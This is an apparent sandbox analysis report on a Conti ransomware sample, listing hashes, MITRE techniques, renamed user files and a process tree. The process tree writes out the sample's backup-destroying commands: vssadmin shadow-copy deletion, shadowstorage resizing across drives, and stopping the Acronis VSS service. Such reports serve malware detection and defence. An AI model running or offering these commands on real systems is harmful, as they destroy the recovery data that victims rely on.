conti | 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24

Analysis

max time kernel
150s
max time network
110s
platform
windows10_x64
resource
win10v200722
submitted
26-08-2020 20:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
Size

101KB
MD5

42e106fd843b0e3585057c30424f695a
SHA1

7b7f0c029a3dcb34a7a448f05b43c5657dd0c471
SHA256

1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24
SHA512

70acd1c36f44bfa4bb6c4dbf40275e2d508e5a610117de2835435a95950549b33c89b012ea3772c85d6189ee06b575bbe193cbe0aa8fb1a8ad9f4a20192e0ae8

Score

10^/10

conti ransomware

Malware Config

Signatures

Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.
ransomware conti
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 12 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\SelectEnable.png => C:\Users\Admin\Pictures\SelectEnable.png.CONTI	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File renamed	C:\Users\Admin\Pictures\AddUse.tiff => C:\Users\Admin\Pictures\AddUse.tiff.CONTI	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Pictures\CompleteInvoke.tiff	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File renamed	C:\Users\Admin\Pictures\CompleteInvoke.tiff => C:\Users\Admin\Pictures\CompleteInvoke.tiff.CONTI	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File renamed	C:\Users\Admin\Pictures\HideCompare.tif => C:\Users\Admin\Pictures\HideCompare.tif.CONTI	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File renamed	C:\Users\Admin\Pictures\OpenRestart.tif => C:\Users\Admin\Pictures\OpenRestart.tif.CONTI	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File renamed	C:\Users\Admin\Pictures\RenameTrace.raw => C:\Users\Admin\Pictures\RenameTrace.raw.CONTI	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File renamed	C:\Users\Admin\Pictures\SplitMount.raw => C:\Users\Admin\Pictures\SplitMount.raw.CONTI	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Pictures\AddUse.tiff	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File renamed	C:\Users\Admin\Pictures\FormatUnlock.tif => C:\Users\Admin\Pictures\FormatUnlock.tif.CONTI	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File renamed	C:\Users\Admin\Pictures\StepWrite.tif => C:\Users\Admin\Pictures\StepWrite.tif.CONTI	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File renamed	C:\Users\Admin\Pictures\SendUnblock.raw => C:\Users\Admin\Pictures\SendUnblock.raw.CONTI	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe

Drops desktop.ini file(s) 24 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Links\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Public\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	svchost.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2336	vssadmin.exe
3568	vssadmin.exe
2544	vssadmin.exe
3068	vssadmin.exe
2152	vssadmin.exe
3264	vssadmin.exe
3900	vssadmin.exe
3936	vssadmin.exe
360	vssadmin.exe
1624	vssadmin.exe
408	vssadmin.exe
3804	vssadmin.exe
3676	vssadmin.exe
1300	vssadmin.exe

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeBackupPrivilege	496	vssvc.exe
Token: SeRestorePrivilege	496	vssvc.exe
Token: SeAuditPrivilege	496	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3956 wrote to memory of 3304	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	66
PID 3956 wrote to memory of 3304	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	66
PID 3956 wrote to memory of 3304	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	66
PID 3304 wrote to memory of 3676	3304	cmd.exe	68
PID 3304 wrote to memory of 3676	3304	cmd.exe	68
PID 3304 wrote to memory of 3676	3304	cmd.exe	68
PID 3956 wrote to memory of 904	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	70
PID 3956 wrote to memory of 904	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	70
PID 3956 wrote to memory of 904	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	70
PID 904 wrote to memory of 360	904	cmd.exe	72
PID 904 wrote to memory of 360	904	cmd.exe	72
PID 904 wrote to memory of 360	904	cmd.exe	72
PID 3956 wrote to memory of 1160	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	73
PID 3956 wrote to memory of 1160	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	73
PID 3956 wrote to memory of 1160	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	73
PID 1160 wrote to memory of 1300	1160	cmd.exe	75
PID 1160 wrote to memory of 1300	1160	cmd.exe	75
PID 1160 wrote to memory of 1300	1160	cmd.exe	75
PID 3956 wrote to memory of 1524	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	76
PID 3956 wrote to memory of 1524	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	76
PID 3956 wrote to memory of 1524	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	76
PID 1524 wrote to memory of 1624	1524	cmd.exe	78
PID 1524 wrote to memory of 1624	1524	cmd.exe	78
PID 1524 wrote to memory of 1624	1524	cmd.exe	78
PID 3956 wrote to memory of 1920	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	79
PID 3956 wrote to memory of 1920	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	79
PID 3956 wrote to memory of 1920	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	79
PID 1920 wrote to memory of 2152	1920	cmd.exe	81
PID 1920 wrote to memory of 2152	1920	cmd.exe	81
PID 1920 wrote to memory of 2152	1920	cmd.exe	81
PID 3956 wrote to memory of 2396	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	82
PID 3956 wrote to memory of 2396	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	82
PID 3956 wrote to memory of 2396	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	82
PID 2396 wrote to memory of 2544	2396	cmd.exe	84
PID 2396 wrote to memory of 2544	2396	cmd.exe	84
PID 2396 wrote to memory of 2544	2396	cmd.exe	84
PID 3956 wrote to memory of 2828	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	85
PID 3956 wrote to memory of 2828	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	85
PID 3956 wrote to memory of 2828	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	85
PID 2828 wrote to memory of 3900	2828	cmd.exe	87
PID 2828 wrote to memory of 3900	2828	cmd.exe	87
PID 2828 wrote to memory of 3900	2828	cmd.exe	87
PID 3956 wrote to memory of 3904	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	88
PID 3956 wrote to memory of 3904	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	88
PID 3956 wrote to memory of 3904	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	88
PID 3904 wrote to memory of 3936	3904	cmd.exe	90
PID 3904 wrote to memory of 3936	3904	cmd.exe	90
PID 3904 wrote to memory of 3936	3904	cmd.exe	90
PID 3956 wrote to memory of 2944	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	91
PID 3956 wrote to memory of 2944	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	91
PID 3956 wrote to memory of 2944	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	91
PID 2944 wrote to memory of 3264	2944	cmd.exe	93
PID 2944 wrote to memory of 3264	2944	cmd.exe	93
PID 2944 wrote to memory of 3264	2944	cmd.exe	93
PID 3956 wrote to memory of 4020	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	94
PID 3956 wrote to memory of 4020	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	94
PID 3956 wrote to memory of 4020	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	94
PID 4020 wrote to memory of 408	4020	cmd.exe	96
PID 4020 wrote to memory of 408	4020	cmd.exe	96
PID 4020 wrote to memory of 408	4020	cmd.exe	96
PID 3956 wrote to memory of 3056	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	97
PID 3956 wrote to memory of 3056	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	97
PID 3956 wrote to memory of 3056	3956	1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe	97
PID 3056 wrote to memory of 3068	3056	cmd.exe	99

C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe
"C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.bin.exe"
1⤵
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3956
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3304
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3676
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:904
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:360
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1160
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1300
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1524
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1624
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1920
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2152
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2396
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2544
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3900
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3904
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3936
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3264
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:408
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  PID:3848
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2336
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  PID:3716
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3804
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3568
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Acronis VSS Provider" /y
  2⤵
  PID:808
- - C:\Windows\SysWOW64\net.exe
    net stop "Acronis VSS Provider" /y
    3⤵
    PID:1184
